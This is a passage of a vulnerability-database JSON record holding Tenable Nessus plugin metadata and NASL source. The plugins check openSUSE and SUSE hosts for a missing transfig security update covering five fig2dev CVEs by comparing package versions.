\"CVE-2019-14275\",\n \"CVE-2019-19555\",\n \"CVE-2019-19746\",\n \"CVE-2019-19797\",\n \"CVE-2021-3561\"\n );\n\n script_name(english:\"openSUSE 15 Security Update : transfig (openSUSE-SU-2021:2454-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SUSE15 host has a package installed that is affected by multiple vulnerabilities as referenced in\nthe openSUSE-SU-2021:2454-1 advisory.\n\n - Xfig fig2dev 3.2.7a has a stack-based buffer overflow in the calc_arrow function in bound.c.\n (CVE-2019-14275)\n\n - read_textobject in read.c in Xfig fig2dev 3.2.7b has a stack-based buffer overflow because of an incorrect\n sscanf. (CVE-2019-19555)\n\n - make_arrow in arrow.c in Xfig fig2dev 3.2.7b allows a segmentation fault and out-of-bounds write because\n of an integer overflow via a large arrow type. (CVE-2019-19746)\n\n - read_colordef in read.c in Xfig fig2dev 3.2.7b has an out-of-bounds write. (CVE-2019-19797)\n\n - An Out of Bounds flaw was found fig2dev version 3.2.8a. A flawed bounds check in read_objects() could\n allow an attacker to provide a crafted malicious input causing the application to either crash or in some\n cases cause memory corruption. The highest threat from this vulnerability is to integrity as well as\n system availability. (CVE-2021-3561)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1143650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1159130\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1159293\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1161698\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186329\");\n # https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/RK4BRVCUPZKN5VS2JGWBPYITONWJCIZJ/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?30d9d3a0\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-14275\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19555\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19746\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19797\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-3561\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected transfig package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3561\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/07/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:transfig\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.3\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/SuSE/release');\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 'openSUSE');\nos_ver = pregmatch(pattern: \"^SUSE([\\d.]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'openSUSE');\nos_ver = os_ver[1];\nif (release !~ \"^(SUSE15\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, 'openSUSE', '15.3', release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'openSUSE ' + os_ver, cpu);\n\npkgs = [\n {'reference':'transfig-3.2.8a-4.12.2', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n cpu = NULL;\n rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'transfig');\n}\n", "naslFamily": "SuSE Local Security Checks", "cpe": ["p-cpe:/a:novell:opensuse:transfig", "cpe:/o:novell:opensuse:15.3"], "solution": "Update the affected transfig package.", "nessusSeverity": "", "cvssScoreSource": "CVE-2021-3561", "vpr": {"risk factor": "Medium", "score": "5.2"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2021-07-22T00:00:00", "vulnerabilityPublicationDate": "2019-07-26T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-06T13:21:46", "differentElements": ["nessusSeverity"], "edition": 4}], "viewCount": 170, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["OPENSUSE-2021-1318.NASL", "OPENSUSE-2020-1843.NASL", "DEBIAN_DLA-2778.NASL", "DEBIAN_DLA-2073.NASL", "SUSE_SU-2021-14823-1.NASL", "SUSE_SU-2021-2454-1.NASL", "AL2_ALAS-2020-1398.NASL", "OPENSUSE-2021-1143.NASL", "FEDORA_2020-5D0F0593AE.NASL", "OPENSUSE-2020-1702.NASL", "AL2_ALAS-2021-1682.NASL", "SUSE_SU-2020-1806-1.NASL", "FEDORA_2020-6A2824178E.NASL", "SUSE_SU-2021-3124-1.NASL"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:1318-1", "OPENSUSE-SU-2020:1702-1", "OPENSUSE-SU-2021:2454-1", "OPENSUSE-SU-2020:1843-1", "OPENSUSE-SU-2021:1311-1", "OPENSUSE-SU-2021:1143-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-3561", "UB:CVE-2019-19797", "UB:CVE-2019-14275", "UB:CVE-2019-19555", "UB:CVE-2019-19746"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-3561", "RH:CVE-2019-19746", "RH:CVE-2019-14275", "RH:CVE-2019-19555", "RH:CVE-2019-19797"]}, {"type": "cve", "idList": ["CVE-2019-19797", "CVE-2019-19746", "CVE-2019-14275", "CVE-2019-19555", "CVE-2021-3561"]}, {"type": "amazon", "idList": ["ALAS2-2021-1682", "ALAS2-2020-1398"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892073", "OPENVAS:1361412562310877392", "OPENVAS:1361412562310877359", "OPENVAS:1361412562310877387", "OPENVAS:1361412562310877368"]}, {"type": "fedora", "idList": ["FEDORA:73FB862622DB", "FEDORA:20E71304CBA3", "FEDORA:B794B627F4F0", "FEDORA:E540F6253477", "FEDORA:983DF624CFF6", "FEDORA:9C4BF3072F18"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2073-1:017FC", "DEBIAN:DLA-2778-1:13AF6"]}], "modified": "2021-08-19T11:59:09", "rev": 2}, "score": {"value": 6.9, "vector": "NONE", "modified": "2021-08-19T11:59:09", "rev": 2}}, "objectVersion": "1.6", "pluginID": "152011", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# openSUSE Security Update openSUSE-SU-2021:2454-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152011);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/07/23\");\n\n script_cve_id(\n \"CVE-2019-14275\",\n \"CVE-2019-19555\",\n \"CVE-2019-19746\",\n \"CVE-2019-19797\",\n \"CVE-2021-3561\"\n );\n\n script_name(english:\"openSUSE 15 Security Update : transfig (openSUSE-SU-2021:2454-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SUSE15 host has a package installed that is affected by multiple vulnerabilities as referenced in\nthe openSUSE-SU-2021:2454-1 advisory.\n\n - Xfig fig2dev 3.2.7a has a stack-based buffer overflow in the calc_arrow function in bound.c.\n (CVE-2019-14275)\n\n - read_textobject in read.c in Xfig fig2dev 3.2.7b has a stack-based buffer overflow because of an incorrect\n sscanf. (CVE-2019-19555)\n\n - make_arrow in arrow.c in Xfig fig2dev 3.2.7b allows a segmentation fault and out-of-bounds write because\n of an integer overflow via a large arrow type. (CVE-2019-19746)\n\n - read_colordef in read.c in Xfig fig2dev 3.2.7b has an out-of-bounds write. (CVE-2019-19797)\n\n - An Out of Bounds flaw was found fig2dev version 3.2.8a. A flawed bounds check in read_objects() could\n allow an attacker to provide a crafted malicious input causing the application to either crash or in some\n cases cause memory corruption. The highest threat from this vulnerability is to integrity as well as\n system availability. (CVE-2021-3561)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1143650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1159130\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1159293\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1161698\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186329\");\n # https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/RK4BRVCUPZKN5VS2JGWBPYITONWJCIZJ/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?30d9d3a0\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-14275\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19555\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19746\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19797\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-3561\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected transfig package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3561\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/07/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:transfig\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.3\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/SuSE/release');\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 'openSUSE');\nos_ver = pregmatch(pattern: \"^SUSE([\\d.]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'openSUSE');\nos_ver = os_ver[1];\nif (release !~ \"^(SUSE15\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, 'openSUSE', '15.3', release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'openSUSE ' + os_ver, cpu);\n\npkgs = [\n {'reference':'transfig-3.2.8a-4.12.2', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n cpu = NULL;\n rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'transfig');\n}\n", "naslFamily": "SuSE Local Security Checks", "cpe": ["p-cpe:/a:novell:opensuse:transfig", "cpe:/o:novell:opensuse:15.3"], "solution": "Update the affected transfig package.", "nessusSeverity": "Medium", "cvssScoreSource": "CVE-2021-3561", "vpr": {"risk factor": "Medium", "score": "5.2"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2021-07-22T00:00:00", "vulnerabilityPublicationDate": "2019-07-26T00:00:00", "exploitableWith": [], "_object_type": "robots.models.nessus.NessusBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.nessus.NessusBulletin"]}, {"id": "SUSE_SU-2021-2454-1.NASL", "hash": "e1b98b40fe67d3bebc66b6cb7d062a6b", "type": "nessus", "bulletinFamily": "scanner", "title": "SUSE SLED15 / SLES15 Security Update : transfig (SUSE-SU-2021:2454-1)", "description": "The remote SUSE Linux SLED15 / SLES15 host has a package installed that is affected by multiple vulnerabilities as referenced in the SUSE-SU-2021:2454-1 advisory.\n\n - Xfig fig2dev 3.2.7a has a stack-based buffer overflow in the calc_arrow function in bound.c.\n (CVE-2019-14275)\n\n - read_textobject in read.c in Xfig fig2dev 3.2.7b has a stack-based buffer overflow because of an incorrect sscanf. (CVE-2019-19555)\n\n - make_arrow in arrow.c in Xfig fig2dev 3.2.7b allows a segmentation fault and out-of-bounds write because of an integer overflow via a large arrow type. (CVE-2019-19746)\n\n - read_colordef in read.c in Xfig fig2dev 3.2.7b has an out-of-bounds write. (CVE-2019-19797)\n\n - An Out of Bounds flaw was found fig2dev version 3.2.8a. A flawed bounds check in read_objects() could allow an attacker to provide a crafted malicious input causing the application to either crash or in some cases cause memory corruption. The highest threat from this vulnerability is to integrity as well as system availability. (CVE-2021-3561)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-07-23T00:00:00", "modified": "2021-08-09T00:00:00", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.1, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/152022", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://www.suse.com/security/cve/CVE-2019-14275", "https://bugzilla.suse.com/1186329", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19555", "https://www.suse.com/security/cve/CVE-2019-19555", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14275", "http://www.nessus.org/u?9dd79152", "https://www.suse.com/security/cve/CVE-2019-19797", "https://bugzilla.suse.com/1159130", "https://bugzilla.suse.com/1159293", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3561", "https://www.suse.com/security/cve/CVE-2021-3561", "https://bugzilla.suse.com/1161698", "https://bugzilla.suse.com/1143650", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19746", "https://www.suse.com/security/cve/CVE-2019-19746", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19797"], "cvelist": ["CVE-2019-14275", "CVE-2019-19555", "CVE-2019-19746", "CVE-2019-19797", "CVE-2021-3561"], "immutableFields": [], "lastseen": "2021-08-19T11:57:55", "history": [{"bulletin": {"id": "SUSE_SU-2021-2454-1.NASL", "hash": "30d6d8549fb236badeb68c9140620734c1fd01d0c50e36d055f7063784b329b7", "type": "nessus", "bulletinFamily": "scanner", "title": "SUSE SLED15 / SLES15 Security Update : transfig (SUSE-SU-2021:2454-1)", "description": "The remote SUSE Linux SLED15 / SLES15 host has a package installed that is affected by multiple vulnerabilities as\nreferenced in the SUSE-SU-2021:2454-1 advisory.\n\n - Xfig fig2dev 3.2.7a has a stack-based buffer overflow in the calc_arrow function in bound.c.\n (CVE-2019-14275)\n\n - read_textobject in read.c in Xfig fig2dev 3.2.7b has a stack-based buffer overflow because of an incorrect\n sscanf. (CVE-2019-19555)\n\n - make_arrow in arrow.c in Xfig fig2dev 3.2.7b allows a segmentation fault and out-of-bounds write because\n of an integer overflow via a large arrow type. (CVE-2019-19746)\n\n - read_colordef in read.c in Xfig fig2dev 3.2.7b has an out-of-bounds write. (CVE-2019-19797)\n\n - An Out of Bounds flaw was found fig2dev version 3.2.8a. A flawed bounds check in read_objects() could\n allow an attacker to provide a crafted malicious input causing the application to either crash or in some\n cases cause memory corruption. The highest threat from this vulnerability is to integrity as well as\n system availability. (CVE-2021-3561)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "published": "2021-07-23T00:00:00", "modified": "2021-07-23T00:00:00", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.1, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/152022", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://bugzilla.suse.com/1161698", "https://bugzilla.suse.com/1159293", "http://www.nessus.org/u?9dd79152", "https://bugzilla.suse.com/1186329", "https://www.suse.com/security/cve/CVE-2019-19746", "https://www.suse.com/security/cve/CVE-2021-3561", "https://www.suse.com/security/cve/CVE-2019-19555", "https://www.suse.com/security/cve/CVE-2019-19797", "https://www.suse.com/security/cve/CVE-2019-14275", "https://bugzilla.suse.com/1159130", "https://bugzilla.suse.com/1143650"], "cvelist": ["CVE-2019-19746", "CVE-2019-19555", "CVE-2019-14275", "CVE-2021-3561", "CVE-2019-19797"], "immutableFields": [], "lastseen": "2021-07-25T05:02:48", "history": [], "viewCount": 118, "enchantments": {"dependencies": {"modified": "2021-07-25T05:02:48", "references": [{"idList": ["UB:CVE-2019-19746", "UB:CVE-2019-19555", "UB:CVE-2019-19797", "UB:CVE-2019-14275", "UB:CVE-2021-3561"], "type": "ubuntucve"}, {"idList": ["DEBIAN:DLA-2073-1:017FC"], "type": "debian"}, {"idList": ["RH:CVE-2021-3561", "RH:CVE-2019-19555", "RH:CVE-2019-19797", "RH:CVE-2019-14275", "RH:CVE-2019-19746"], "type": "redhatcve"}, {"idList": ["OPENSUSE-2021-2454.NASL", "OPENSUSE-2020-1843.NASL", "FEDORA_2020-6A2824178E.NASL", "FEDORA_2020-5D0F0593AE.NASL", "OPENSUSE-2020-1702.NASL", "DEBIAN_DLA-2073.NASL", "AL2_ALAS-2021-1682.NASL", "SUSE_SU-2020-1806-1.NASL", "AL2_ALAS-2020-1398.NASL"], "type": "nessus"}, {"idList": ["CVE-2019-19746", "CVE-2019-19555", "CVE-2019-14275", "CVE-2021-3561", "CVE-2019-19797"], "type": "cve"}, {"idList": ["ALAS2-2020-1398", "ALAS2-2021-1682"], "type": "amazon"}, {"idList": ["FEDORA:983DF624CFF6", "FEDORA:73FB862622DB", "FEDORA:9C4BF3072F18", "FEDORA:B794B627F4F0", "FEDORA:20E71304CBA3", "FEDORA:E540F6253477"], "type": "fedora"}, {"idList": ["OPENSUSE-SU-2020:1702-1", "OPENSUSE-SU-2020:1843-1", "OPENSUSE-SU-2021:2454-1"], "type": "suse"}, {"idList": ["OPENVAS:1361412562310877387", "OPENVAS:1361412562310892073", "OPENVAS:1361412562310877392", "OPENVAS:1361412562310877368", "OPENVAS:1361412562310877359"], "type": "openvas"}], "rev": 2}, "score": {"modified": "2021-07-25T05:02:48", "rev": 2, "value": 6.8, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "152022", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# SUSE update advisory SUSE-SU-2021:2454-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152022);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/07/23\");\n\n script_cve_id(\n \"CVE-2019-14275\",\n \"CVE-2019-19555\",\n \"CVE-2019-19746\",\n \"CVE-2019-19797\",\n \"CVE-2021-3561\"\n );\n script_xref(name:\"SuSE\", value:\"SUSE-SU-2021:2454-1\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : transfig (SUSE-SU-2021:2454-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SLED15 / SLES15 host has a package installed that is affected by multiple vulnerabilities as\nreferenced in the SUSE-SU-2021:2454-1 advisory.\n\n - Xfig fig2dev 3.2.7a has a stack-based buffer overflow in the calc_arrow function in bound.c.\n (CVE-2019-14275)\n\n - read_textobject in read.c in Xfig fig2dev 3.2.7b has a stack-based buffer overflow because of an incorrect\n sscanf. (CVE-2019-19555)\n\n - make_arrow in arrow.c in Xfig fig2dev 3.2.7b allows a segmentation fault and out-of-bounds write because\n of an integer overflow via a large arrow type. (CVE-2019-19746)\n\n - read_colordef in read.c in Xfig fig2dev 3.2.7b has an out-of-bounds write. (CVE-2019-19797)\n\n - An Out of Bounds flaw was found fig2dev version 3.2.8a. A flawed bounds check in read_objects() could\n allow an attacker to provide a crafted malicious input causing the application to either crash or in some\n cases cause memory corruption. The highest threat from this vulnerability is to integrity as well as\n system availability. (CVE-2021-3561)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1143650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1159130\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1159293\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1161698\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186329\");\n # https://lists.suse.com/pipermail/sle-security-updates/2021-July/009201.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9dd79152\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-14275\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19555\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19746\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19797\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-3561\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected transfig package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3561\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/07/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:transfig\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'SUSE');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, 'SUSE SLED15 / SLES15', 'SUSE ' + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'SUSE ' + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP2/3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 